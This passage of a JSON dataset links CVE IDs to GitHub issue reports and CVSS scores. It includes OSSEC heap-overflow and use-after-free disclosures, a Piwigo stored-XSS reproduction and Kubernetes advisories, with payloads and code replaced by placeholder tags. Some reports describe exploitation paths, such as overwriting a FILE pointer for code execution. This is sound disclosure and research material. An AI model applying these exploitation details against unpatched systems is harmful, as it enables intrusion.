  61966. "description": "Issue with usage of file protocol scheme. This library is creating temporary files and loading them up with PATHTAG protocol scheme URLTAG url when APITAG function is used. Using a file protocol scheme along with headless browser such as Chrome on a server side is not a good idea and will lead to Local file disclosure APITAG Vulnerability). Other local files present on the server could be loaded when a malicious HTML is provided. Local files can be loaded either with APITAG (e.g. APITAG ) or by setting the different document location. Also, it is unlikely for the developers to check each and every page for malicious APITAG inputs. This vulnerability can be verified by using below snippet CODETAG I see it can be fixed either in the PHP code or in the JS code. I believe this small JS snippet can be added at URLTAG url to make it secure. Below code can be added to library which validates the file protocol scheme and use the APITAG puppeteer function which loads in 'about:blank' page and does not cause any harm even if malicious APITAG inputs are provided. ERRORTAG I am not sure about the performance impact this additional code will create. Let me know your comments",
  61967. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  61968. "severity": "MEDIUM",
  61969. "baseScore": 5.3,
  61970. "impactScore": 1.4,
  61971. "exploitabilityScore": 3.9
  61972. },
  61973. {
  61974. "CVE_ID": "CVE-2020-7791",
  61975. "Issue_Url_old": "https://github.com/turquoiseowl/i18n/issues/387",
  61976. "Issue_Url_new": "https://github.com/turquoiseowl/i18n/issues/387",
  61977. "Repo_new": "turquoiseowl/i18n",
  61978. "Issue_Created_At": "2019-08-13T11:07:02Z",
  61979. "description": "Security vulnerability crashes app pool. MENTIONTAG During some penetration testing of our application, the testers have found a security vulnerability in the i NUMBERTAG n library that potentially crashes the app pool. I have a fix, but not the contribution rights and presumably its not a great idea to describe the issue in too much detail in public lest somebody decides to hijack this vulnerability.",
  61980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  61981. "severity": "HIGH",
  61982. "baseScore": 7.5,
  61983. "impactScore": 3.6,
  61984. "exploitabilityScore": 3.9
  61985. },
  61986. {
  61987. "CVE_ID": "CVE-2020-7955",
  61988. "Issue_Url_old": "https://github.com/hashicorp/consul/issues/7160",
  61989. "Issue_Url_new": "https://github.com/hashicorp/consul/issues/7160",
  61990. "Repo_new": "hashicorp/consul",
  61991. "Issue_Created_At": "2020-01-28T23:54:33Z",
  61992. "description": "Reserved Issue Number.",
  61993. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  61994. "severity": "MEDIUM",
  61995. "baseScore": 5.3,
  61996. "impactScore": 1.4,
  61997. "exploitabilityScore": 3.9
  61998. },
  61999. {
  62000. "CVE_ID": "CVE-2020-7956",
  62001. "Issue_Url_old": "https://github.com/hashicorp/nomad/issues/7003",
  62002. "Issue_Url_new": "https://github.com/hashicorp/nomad/issues/7003",
  62003. "Repo_new": "hashicorp/nomad",
  62004. "Issue_Created_At": "2020-01-28T19:12:39Z",
  62005. "description": "Reserved Issue Number. TBD",
  62006. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62007. "severity": "CRITICAL",
  62008. "baseScore": 9.8,
  62009. "impactScore": 5.9,
  62010. "exploitabilityScore": 3.9
  62011. },
  62012. {
  62013. "CVE_ID": "CVE-2020-8089",
  62014. "Issue_Url_old": "https://github.com/Piwigo/Piwigo/issues/1150",
  62015. "Issue_Url_new": "https://github.com/piwigo/piwigo/issues/1150",
  62016. "Repo_new": "piwigo/piwigo",
  62017. "Issue_Created_At": "2020-01-20T13:47:13Z",
  62018. "description": "Stored Cross Site Scripting vulnerability in Piwigo CMS. Description: Piwigo version NUMBERTAG is affected by stored cross site scripting vulnerability. This vulnerability exists in APITAG Name\" Field in \"group_list\" page. How to reproduce NUMBERTAG Login into the application NUMBERTAG Go to the APITAG > APITAG page from life navigation menu NUMBERTAG Click on APITAG Group\" button and then in APITAG Name\" field insert the payload APITAG and hit add button. CVSS Score: PATHTAG POST APITAG HTTP NUMBERTAG Host: APITAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG WOW NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG / ;q NUMBERTAG Accept Language: en US,en;q NUMBERTAG Accept Encoding: gzip, deflate Content Type: application/x www form urlencoded Content Length NUMBERTAG Origin: FILETAG Connection: close Cookie: APITAG phavsz NUMBERTAG APITAG APITAG APITAG FILETAG FILETAG",
  62019. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  62020. "severity": "MEDIUM",
  62021. "baseScore": 5.4,
  62022. "impactScore": 2.7,
  62023. "exploitabilityScore": 2.3
  62024. },
  62025. {
  62026. "CVE_ID": "CVE-2020-8112",
  62027. "Issue_Url_old": "https://github.com/uclouvain/openjpeg/issues/1231",
  62028. "Issue_Url_new": "https://github.com/uclouvain/openjpeg/issues/1231",
  62029. "Repo_new": "uclouvain/openjpeg",
  62030. "Issue_Created_At": "2020-01-28T11:05:53Z",
  62031. "description": "Another heap buffer overflow in libopenjp2. Hi, This overflow looks similar to NUMBERTAG but still works on latest master APITAG ERRORTAG Steps to reproduce as in NUMBERTAG the crashing input is available here PATHTAG . Thank you!",
  62032. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  62033. "severity": "HIGH",
  62034. "baseScore": 8.8,
  62035. "impactScore": 5.9,
  62036. "exploitabilityScore": 2.8
  62037. },
  62038. {
  62039. "CVE_ID": "CVE-2020-8116",
  62040. "Issue_Url_old": "https://github.com/sindresorhus/dot-prop/issues/63",
  62041. "Issue_Url_new": "https://github.com/sindresorhus/dot-prop/issues/63",
  62042. "Repo_new": "sindresorhus/dot-prop",
  62043. "Issue_Created_At": "2020-08-12T09:55:49Z",
  62044. "description": "Please backport CVETAG security fix to NUMBERTAG Based on the severity of CVETAG URLTAG and the fact that NUMBERTAG is still very commonly used as a dependency, I would like to kindly request for the fix URLTAG to be backported to NUMBERTAG and released as (presumably NUMBERTAG Would this be possible? Many thanks in advance.",
  62045. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
  62046. "severity": "HIGH",
  62047. "baseScore": 7.3,
  62048. "impactScore": 3.4,
  62049. "exploitabilityScore": 3.9
  62050. },
  62051. {
  62052. "CVE_ID": "CVE-2020-8203",
  62053. "Issue_Url_old": "https://github.com/lodash/lodash/issues/4874",
  62054. "Issue_Url_new": "https://github.com/lodash/lodash/issues/4874",
  62055. "Repo_new": "lodash/lodash",
  62056. "Issue_Created_At": "2020-07-24T03:51:51Z",
  62057. "description": "CVETAG is not modified in FILETAG . URLTAG issue: URLTAG description: the issue is modified in FILETAG since NUMBERTAG but not modified util APITAG Could anyone modify it? Thanks~",
  62058. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62059. "severity": "HIGH",
  62060. "baseScore": 7.4,
  62061. "impactScore": 5.2,
  62062. "exploitabilityScore": 2.2
  62063. },
  62064. {
  62065. "CVE_ID": "CVE-2020-8203",
  62066. "Issue_Url_old": "https://github.com/lodash/lodash/issues/4744",
  62067. "Issue_Url_new": "https://github.com/lodash/lodash/issues/4744",
  62068. "Repo_new": "lodash/lodash",
  62069. "Issue_Created_At": "2020-04-30T02:52:25Z",
  62070. "description": "Prototype pollution attack in APITAG Affects: lodash NUMBERTAG and below. By including APITAG in the path of objects to zip, APITAG can be polluted. This particularly affects beginning the path with APITAG which pollutes the global scope. This vulnerability was disclosed two days ago: URLTAG",
  62071. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:H",
  62072. "severity": "HIGH",
  62073. "baseScore": 7.4,
  62074. "impactScore": 5.2,
  62075. "exploitabilityScore": 2.2
  62076. },
  62077. {
  62078. "CVE_ID": "CVE-2020-8285",
  62079. "Issue_Url_old": "https://github.com/curl/curl/issues/6255",
  62080. "Issue_Url_new": "https://github.com/curl/curl/issues/6255",
  62081. "Repo_new": "curl/curl",
  62082. "Issue_Created_At": "2020-11-27T09:33:17Z",
  62083. "description": "Stack overflow in libcurl when CURLOPT_WILDCARDMATCH is in use. ERRORTAG The reason is about NUMBERTAG files in the directory. libcurl version NUMBERTAG compiler: VS NUMBERTAG",
  62084. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62085. "severity": "HIGH",
  62086. "baseScore": 7.5,
  62087. "impactScore": 3.6,
  62088. "exploitabilityScore": 3.9
  62089. },
  62090. {
  62091. "CVE_ID": "CVE-2020-8296",
  62092. "Issue_Url_old": "https://github.com/nextcloud/server/issues/17439",
  62093. "Issue_Url_new": "https://github.com/nextcloud/server/issues/17439",
  62094. "Repo_new": "nextcloud/server",
  62095. "Issue_Created_At": "2019-10-07T11:19:59Z",
  62096. "description": "Oc_credentials security?. Hi, Can i get informations about the algorithm used to hash password inside oc_credentials. I think this is synchronous hash because nextcloud need it with external storage but i\u2019m not sure ? Best regards",
  62097. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  62098. "severity": "MEDIUM",
  62099. "baseScore": 6.7,
  62100. "impactScore": 5.9,
  62101. "exploitabilityScore": 0.8
  62102. },
  62103. {
  62104. "CVE_ID": "CVE-2020-8440",
  62105. "Issue_Url_old": "https://github.com/niteosoft/simplejobscript/issues/10",
  62106. "Issue_Url_new": "https://github.com/niteosoft/simplejobscript/issues/10",
  62107. "Repo_new": "niteosoft/simplejobscript",
  62108. "Issue_Created_At": "2020-01-19T13:19:49Z",
  62109. "description": "FILETAG",
  62110. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62111. "severity": "CRITICAL",
  62112. "baseScore": 9.8,
  62113. "impactScore": 5.9,
  62114. "exploitabilityScore": 3.9
  62115. },
  62116. {
  62117. "CVE_ID": "CVE-2020-8442",
  62118. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1821",
  62119. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1821",
  62120. "Repo_new": "ossec/ossec-hids",
  62121. "Issue_Created_At": "2020-01-15T21:02:37Z",
  62122. "description": "OSSEC HIDS Security Audit Findings. Hi folks, I spent some free time recently auditing OSSEC. I was primarily focused on a threat model where an OSSEC agent is compromised (e.g. the agent key and assoc. counters are known) and used to attack the OSSEC server (primarily APITAG and APITAG ). Given the problem domain of OSSEC and HIDS generally I think this is fair game. I found a handful of bugs and have done my best to address the root cause, the affected versions, the impact and potential fixes in the issues I've filed. I will request CVEs for the security relevant bugs later on. In terms of rough risk levels I'd categorize the findings as follows: Informational: os_regex empty pcre2 off by one URLTAG rootcheck check rc if shell injection risk URLTAG Low: analysisd syscheck decoder msg location path injection URLTAG analysisd APITAG allows control chars in msg URLTAG analysisd APITAG bad location segfault URLTAG Med: analysisd APITAG off by one syslog URLTAG analysisd APITAG use after free ossecalert URLTAG analysisd APITAG use after free syscheck URLTAG analysisd syscheck decoder off by one read URLTAG High: analysisd rootcheck decoder heap overflow URLTAG Some caveats/context to add NUMBERTAG I'm not a professional C coder, w.r.t suggested fixes YMM NUMBERTAG I don't write exploits for a living. My assessments of exploitability/risk should be considered lower bounds NUMBERTAG This wasn't an extensive audit. I followed my nose and used some fuzzing NUMBERTAG OSSEC NUMBERTAG seems to be the earliest tag in the Github repo. I didn't dig deeper into history to see if any of these bugs affect older releases (some likely do). If you would be interested in trying to adopt fuzzing as part of your CI (or as an integration with oss fuzz, etc) I'd be happy to try and provide some notes but likely don't have the resources to implement it myself to a merge able standard of work. Thanks! You can close this top level issue as you see appropriate.",
  62123. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62124. "severity": "HIGH",
  62125. "baseScore": 8.8,
  62126. "impactScore": 5.9,
  62127. "exploitabilityScore": 2.8
  62128. },
  62129. {
  62130. "CVE_ID": "CVE-2020-8442",
  62131. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1820",
  62132. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1820",
  62133. "Repo_new": "ossec/ossec-hids",
  62134. "Issue_Created_At": "2020-01-15T21:01:47Z",
  62135. "description": "analysisd rootcheck decoder: heap overflow in APITAG The APITAG rootcheck decoder ( APITAG ) allocates two fixed size heap buffers via global static vars. One, APITAG is an array of APITAG size APITAG . The other APITAG is an array of APITAG , also size APITAG . In a default build MAX_AGENTS is NUMBERTAG URLTAG When processing rootcheck messages the APITAG function is called to find a file pointer for the given agent name. In APITAG a while loop with a index counter i is used to try and find an index of APITAG that matches the provided agent name. No check of i is made to ensure that it stays within the bound of APITAG , resulting in a straight forward heap buffer overflow when more than APITAG syscheck update messages for distinct agent names are processed. This code was introduced in the original rootcheck functionality with APITAG on Oct NUMBERTAG I believe it affects OSSEC NUMBERTAG This is triggerable via an authenticated client through the APITAG . The client needs only write MAX_AGENT rootcheck update messages with distinct message agent names. While APITAG always sets the agent name portion of messages passed on to APITAG with a prefix out of the attackers control based on the agent key and src IP ( APITAG ) the portion after this prefix is attacker controlled and thus can be mutated to make more than MAX_AGENT unique names that will be decoded by the APITAG . Notably this bug has fairly high potential for exploitation. The attacker is able to overwrite a FILE pointer with a pointer to the agent name, which is mostly attacker controlled (minus a short prefix), and can be up to NUMBERTAG strlen(prefix) bytes long. I'm definitely able to reliably segfault the APITAG process with this bug though I was personally unable to reliable control of execution. Overwriting a FILE pointer with a pointer to attacker controlled data is a common way to achieve reliably code execution. There are many pointers in the FILE struct to be abused and while libc has added some hardening it isn't applicable for versions NUMBERTAG or lower (e.g. Ubuntu NUMBERTAG and bypass techniques are well known. URLTAG URLTAG URLTAG In this case there are two additional challenges to exploiting the bug that stumped me but may not stump someone who is actually good at writing exploits NUMBERTAG Since the protocol is all string based you can't use a null byte in payload that overwrites the FILE contents which makes specifying valid pointers on NUMBERTAG ery challenging. APITAG get one terminating NUMBERTAG at the end of your payload which can be used for the high order byte of a pointer, but it's still a challenge to find useful targets in high mem NUMBERTAG Getting your overwritten APITAG entry used with fseek requires being able to specify the APITAG name at the matching i value. Usually this is the first bytes of a valid FILE and so I _think_ the attacker needs full control of the agent name to be able to specify a match (usually APITAG or similar. The value is predictable based on rootcheck's open flags). If I'm correct this might mean the segfault is remotely triggerable but exploiting the FILE overwrite may not be. To fix this the while conditions in APITAG and APITAG should be rewritten to short circuit if APITAG : E.g. instead of: APITAG Use: APITAG I think it's worth noting that this bug is nearly identical to the one reported by Paul Southerington in the syscheck decoder, patched in Feb NUMBERTAG URLTAG It has looks like this was fixed in OSSEC's Wazuh's fork at some point, though potentially without realizing it fixed a vulnerability: URLTAG This seems like a place where process improvement could help. Receiving vulnerability reports should trigger a search through the codebase for equivalent problems.",
  62136. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  62137. "severity": "HIGH",
  62138. "baseScore": 8.8,
  62139. "impactScore": 5.9,
  62140. "exploitabilityScore": 2.8
  62141. },
  62142. {
  62143. "CVE_ID": "CVE-2020-8443",
  62144. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1816",
  62145. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1816",
  62146. "Repo_new": "ossec/ossec-hids",
  62147. "Issue_Created_At": "2020-01-15T21:00:33Z",
  62148. "description": "analysisd: APITAG off by one heap overflow cleaning syslog msgs.. In APITAG the APITAG function performs pattern matching and if applicable, tries to decode syslog messages to populate some lf structure fields according to the syslog data. URLTAG When a message contains leading text matching the patterns expected for syslog, and contains a substring like APITAG in the correct location APITAG will attempt to remove it by advancing the APITAG pointer beyond the end of the substring: URLTAG The code is careful about checking the result from strstr when advancing to the expected closing APITAG , however it makes an assumption that there must be a non null character following the APITAG when it subsequently advances the pieces pointer by NUMBERTAG URLTAG If a message like APITAG is processed APITAG will advance beyond the terminating null byte of APITAG , resulting in a heap overflow when operating on the APITAG pointer subsequently during decoding. This code was introduced in APITAG on No NUMBERTAG I believe it affects FILETAG . This is triggerable via an authenticated client through the APITAG . The client needs only write a message to the remote server of any queue type that will match the expected syslog format and authority substring, but end immediately after the APITAG . I think the best fix is to change the pieces pointer to be incremented by NUMBERTAG instead of NUMBERTAG or to update the strstr check for APITAG instead of just APITAG .",
  62149. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62150. "severity": "CRITICAL",
  62151. "baseScore": 9.8,
  62152. "impactScore": 5.9,
  62153. "exploitabilityScore": 3.9
  62154. },
  62155. {
  62156. "CVE_ID": "CVE-2020-8444",
  62157. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1817",
  62158. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1817",
  62159. "Repo_new": "ossec/ossec-hids",
  62160. "Issue_Created_At": "2020-01-15T21:00:51Z",
  62161. "description": "analysisd: APITAG heap use after free with ossec alert msgs.. The APITAG 's APITAG function calls APITAG at the start of processing a received message from the ossec queue UNIX domain socket. In APITAG the APITAG function populates the lf struct, setting fields like log , hostname and APITAG to substrings of the APITAG buffer. After cleaning any messages that meet the ossec alert decoder's criteria are given to that decoder for further processing. After processing an ossec alert msg from a client the ossec alert decoder will free the APITAG pointer at the end of its processing, replacing it with a new pointer and populating APITAG : URLTAG Though the APITAG function returns NULL and not APITAG further rule processing of the lf struct occurs during APITAG because of the APITAG set by the decoder before freeing APITAG . URLTAG If any subsequent processing associated with the generated rule accesses the APITAG or APITAG fields set by APITAG they will be accessing memory of a freed heap chunk previously containing the APITAG . I believe the bug was introduced in APITAG on July NUMBERTAG and affects OSSEC NUMBERTAG This is triggerable via an authenticated client through the APITAG . The client needs only write a ossecalert message that will have the APITAG or hostname set during APITAG . I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing APITAG or hostname during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the ossecalert decoder to APITAG the APITAG and APITAG before freeing APITAG .",
  62162. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62163. "severity": "CRITICAL",
  62164. "baseScore": 9.8,
  62165. "impactScore": 5.9,
  62166. "exploitabilityScore": 3.9
  62167. },
  62168. {
  62169. "CVE_ID": "CVE-2020-8445",
  62170. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1814",
  62171. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1814",
  62172. "Repo_new": "ossec/ossec-hids",
  62173. "Issue_Created_At": "2020-01-15T20:59:57Z",
  62174. "description": "analysisd: APITAG allows control characters in msg.. The APITAG 's APITAG function doesn't remove or encode terminal control charters or newlines from processed log messages. In many cases those control characters/newline are later logged. There have been cases where allowing arbitrary control characters in log messages has led to command execution with specific terminal emulator implementations. As a result many pieces of software (e.g. Apache HTTPD URLTAG have added escaping of control characters in log messages. It may also be possible to abuse terminal control characters to hide previous messages in a log, tricking system administrators into missing events. Similarly, because newlines ( APITAG ) are permitted in messages processed by APITAG it may be possible to inject nested events to the ossec log. This may result in system administrators being tricked into thinking alerts fired that did not.",
  62175. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62176. "severity": "CRITICAL",
  62177. "baseScore": 9.8,
  62178. "impactScore": 5.9,
  62179. "exploitabilityScore": 3.9
  62180. },
  62181. {
  62182. "CVE_ID": "CVE-2020-8446",
  62183. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1813",
  62184. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1813",
  62185. "Repo_new": "ossec/ossec-hids",
  62186. "Issue_Created_At": "2020-01-15T20:59:40Z",
  62187. "description": "analysisd: syscheck decoder location path injection.. The APITAG 's syscheck decoder ( APITAG ) performs unsafe path handling using the received agent name when trying to get the agent file. The APITAG function uses the agent name unsanitized when building a file name to be used with fopen . URLTAG Processing a syscheck message like APITAG from an agent named test sending from localhost results in an open for APITAG This will fail with ENOTDIR because the part of the path the attacker can't control remotely ( APITAG ) is not a directory. Creating it first by sending a message like APITAG seems like a potential solution at first but won't work because while the file APITAG will be created it won't be created as a directory but a regular file. I suspect this means that the bug is only useful to local attackers (that can write directly to the ossec queue). Writing directly to the queue allows full control of the APITAG used as the agent argument to fopen and can cause the syscheck DB file to be created in an attacker controlled location within the chroot . Remote attackers can not control the full APITAG since the APITAG ensures the prefix of agent name and source IP is always present. Likely the best fix is to use the APITAG function from APITAG on the location filed populated by APITAG and rejecting any values that have a APITAG return from that function.",
  62188. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
  62189. "severity": "MEDIUM",
  62190. "baseScore": 5.5,
  62191. "impactScore": 3.6,
  62192. "exploitabilityScore": 1.8
  62193. },
  62194. {
  62195. "CVE_ID": "CVE-2020-8447",
  62196. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1818",
  62197. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1818",
  62198. "Repo_new": "ossec/ossec-hids",
  62199. "Issue_Created_At": "2020-01-15T21:01:03Z",
  62200. "description": "analysisd: APITAG heap use after free decoding syscheck msgs.. The APITAG 's APITAG function calls APITAG at the start of processing a message read from the ossec queue UNIX domain socket. In APITAG the APITAG function populates the lf struct, setting fields like log , hostname and APITAG to substrings of the APITAG buffer. After cleaning any syscheck messages are given to the syscheck decoder for further processing. After processing a syscheck msg from a client the syscheck decoder will free the APITAG pointer in two places. One place is if the message indicated a change in an existing tracked file: URLTAG Another place is if the message indicated a new file to track: URLTAG In both cases the syscheck decoder replaces the existing APITAG and APITAG pointers with pointers to new messages after first freeing the old APITAG . Afterwards the APITAG , and APITAG functions return NUMBERTAG to APITAG . Since the decoder returned NUMBERTAG the APITAG function will continue processing the event, it will not jump to CLMEM : URLTAG If any subsequent processing rules access the APITAG or APITAG fields set by APITAG they will be accessing memory of a freed heap chunk previously containing APITAG . I believe the bug was introduced in APITAG on No NUMBERTAG and affects OSSEC NUMBERTAG This code path is triggerable via an authenticated client through the APITAG . The client needs only write a valid syscheck message that will have the APITAG or hostname set during APITAG . I don't have a strong sense for the possibility of exploitation. I suspect this may be turned into an out of bounds read of heap memory accessing APITAG or hostname during rule processing if the area pointed to after the syscheck decoder free isn't null terminated. One possible fix would be for the syscheck decoder to APITAG the APITAG and APITAG before freeing APITAG .",
  62201. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  62202. "severity": "CRITICAL",
  62203. "baseScore": 9.8,
  62204. "impactScore": 5.9,
  62205. "exploitabilityScore": 3.9
  62206. },
  62207. {
  62208. "CVE_ID": "CVE-2020-8448",
  62209. "Issue_Url_old": "https://github.com/ossec/ossec-hids/issues/1815",
  62210. "Issue_Url_new": "https://github.com/ossec/ossec-hids/issues/1815",
  62211. "Repo_new": "ossec/ossec-hids",
  62212. "Issue_Created_At": "2020-01-15T21:00:12Z",
  62213. "description": "analysisd: APITAG segfault processing invalid msg location.. In APITAG the APITAG 's APITAG function handles the location portion of a message differently when the first character after a NUMBERTAG digit ID is APITAG , indicating it came from a remote agent via APITAG . When remote agent locations are processed APITAG tries to null terminate the received location substring of the overall log message to store in APITAG by advancing past the APITAG in the string to the first APITAG character: URLTAG Unfortunately the nesting of strstr as the first argument to strchr on L NUMBERTAG doesn't account for the possibility of a location string that starts with APITAG but doesn't contain a APITAG . E.g. processing the msg APITAG will result in the strstr returning NULL, meaning the strchr call will be APITAG and a segfault will occur. This code was introduced in APITAG on No NUMBERTAG I believe it affects FILETAG . It seems that in all cases APITAG will always write a well formed location into the message it writes to the ossec UNIX domain socket queue because it uses APITAG and populates the locmsg unconditionally: URLTAG URLTAG I believe that means the only way this is triggerable is with direct write access to the socket, and probably makes the exploitability very low. One possible fix is to separate the strstr and return an error when it returns NULL before performing the subsequent strchr with the result pointer.",
  62214. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  62215. "severity": "MEDIUM",
  62216. "baseScore": 5.5,
  62217. "impactScore": 3.6,
  62218. "exploitabilityScore": 1.8
  62219. },
  62220. {
  62221. "CVE_ID": "CVE-2020-8548",
  62222. "Issue_Url_old": "https://github.com/antonreshetov/massCode/issues/44",
  62223. "Issue_Url_new": "https://github.com/antonreshetov/masscode/issues/44",
  62224. "Repo_new": "antonreshetov/massCode",
  62225. "Issue_Created_At": "2020-02-02T05:49:29Z",
  62226. "description": "RCE in APITAG Describe the bug You can use masscode to render the document in markdown but it failed to protect itself from cross site script attacks (XSS). Further, it has been identified that in APITAG flag APITAG is set to true which leads to remote code execution issue in masscode Expected behaviour It should not execute APITAG code while rendering the document in markdown Screenshots URLTAG Environment Version NUMBERTAG alpha NUMBERTAG OS version and name: windows NUMBERTAG",
  62227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62228. "severity": "MEDIUM",
  62229. "baseScore": 6.1,
  62230. "impactScore": 2.7,
  62231. "exploitabilityScore": 2.8
  62232. },
  62233. {
  62234. "CVE_ID": "CVE-2020-8548",
  62235. "Issue_Url_old": "https://github.com/antonreshetov/massCode/issues/43",
  62236. "Issue_Url_new": "https://github.com/antonreshetov/masscode/issues/43",
  62237. "Repo_new": "antonreshetov/massCode",
  62238. "Issue_Created_At": "2020-02-01T19:04:27Z",
  62239. "description": "Vulnerability report please contact. Hello, I would like to report a security bug in APITAG Can you please contact me on nikhil. EMAILTAG Best regards, Nikhil",
  62240. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  62241. "severity": "MEDIUM",
  62242. "baseScore": 6.1,
  62243. "impactScore": 2.7,
  62244. "exploitabilityScore": 2.8
  62245. },
  62246. {
  62247. "CVE_ID": "CVE-2020-8551",
  62248. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89377",
  62249. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89377",
  62250. "Repo_new": "kubernetes/kubernetes",
  62251. "Issue_Created_At": "2020-03-23T18:34:40Z",
  62252. "description": "CVETAG : Kubelet APITAG via API. CVSS Rating: PATHTAG URLTAG APITAG The Kubelet has been found to be vulnerable to a denial of service attack via the kubelet API, including the unauthenticated HTTP read only API typically served on port NUMBERTAG and the authenticated HTTPS API typically served on port NUMBERTAG Am I vulnerable? If an attacker can make a request to an unpatched kubelet, then you may be vulnerable to this. Affected Versions kubelet NUMBERTAG kubelet NUMBERTAG kubelet NUMBERTAG How do I mitigate this vulnerability? Limit access to the Kubelet API or patch the Kubelet. Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Henrik Schmidt /area security /kind bug /committee product security /sig node /area kubelet",
  62253. "vectorString": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  62254. "severity": "MEDIUM",
  62255. "baseScore": 6.5,
  62256. "impactScore": 3.6,
  62257. "exploitabilityScore": 2.8
  62258. },
  62259. {
  62260. "CVE_ID": "CVE-2020-8552",
  62261. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/89378",
  62262. "Issue_Url_new": "https://github.com/kubernetes/kubernetes/issues/89378",
  62263. "Repo_new": "kubernetes/kubernetes",
  62264. "Issue_Created_At": "2020-03-23T18:35:34Z",
  62265. "description": "CVETAG : apiserver APITAG (oom). CVSS Rating: PATHTAG URLTAG APITAG The Kubernetes API server has been found to be vulnerable to a denial of service attack via authorized API requests. Am I vulnerable? If an attacker that can make an authorized resource request to an unpatched API server (see below), then you are vulnerable to this. Prior to NUMBERTAG this was possible via unauthenticated requests by default. Affected Versions kube apiserver NUMBERTAG kube apiserver NUMBERTAG kube apiserver NUMBERTAG How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by: Preventing unauthenticated or unauthorized access to all apis The apiserver should auto restart if it OOMs Fixed Versions NUMBERTAG To upgrade, refer to the documentation: URLTAG Acknowledgements This vulnerability was reported by: Gus Lees APITAG /area security /kind bug /committee product security /sig api machinery",
  62266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
  62267. "severity": "MEDIUM",
  62268. "baseScore": 4.3,
  62269. "impactScore": 1.4,
  62270. "exploitabilityScore": 2.8
  62271. },
  62272. {
  62273. "CVE_ID": "CVE-2020-8553",
  62274. "Issue_Url_old": "https://github.com/kubernetes/ingress-nginx/issues/5126",
  62275. "Issue_Url_new": "https://github.com/kubernetes/ingress-nginx/issues/5126",
  62276. "Repo_new": "kubernetes/ingress-nginx",
  62277. "Issue_Created_At": "2020-02-19T19:00:32Z",
  62278. "description": "CVETAG : auth type basic annotation vulnerability. A security issue was discovered in ingress nginx versions older than NUMBERTAG The issue is of medium severity, and upgrading is encouraged to fix the vulnerability. Am I vulnerable? The vulnerability exists only if the annotation APITAG type: basic URLTAG is used. How do I upgrade? Follow installation instructions here URLTAG Vulnerability Details A vulnerability has been discovered where a malicious user could create a new Ingress definition resulting in the replacement of the password file. The vulnerability requires that the victim namespace and/or secret use a hyphen in the name. This scenario requires privileges in the cluster to create and read ingresses and also create secrets. This issue is filed as CVETAG . /close",
  62279. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N",
  62280. "severity": "MEDIUM",
  62281. "baseScore": 5.9,
  62282. "impactScore": 5.2,
  62283. "exploitabilityScore": 0.7
  62284. },
  62285. {
  62286. "CVE_ID": "CVE-2020-8554",
  62287. "Issue_Url_old": "https://github.com/kubernetes/kubernetes/issues/97076",
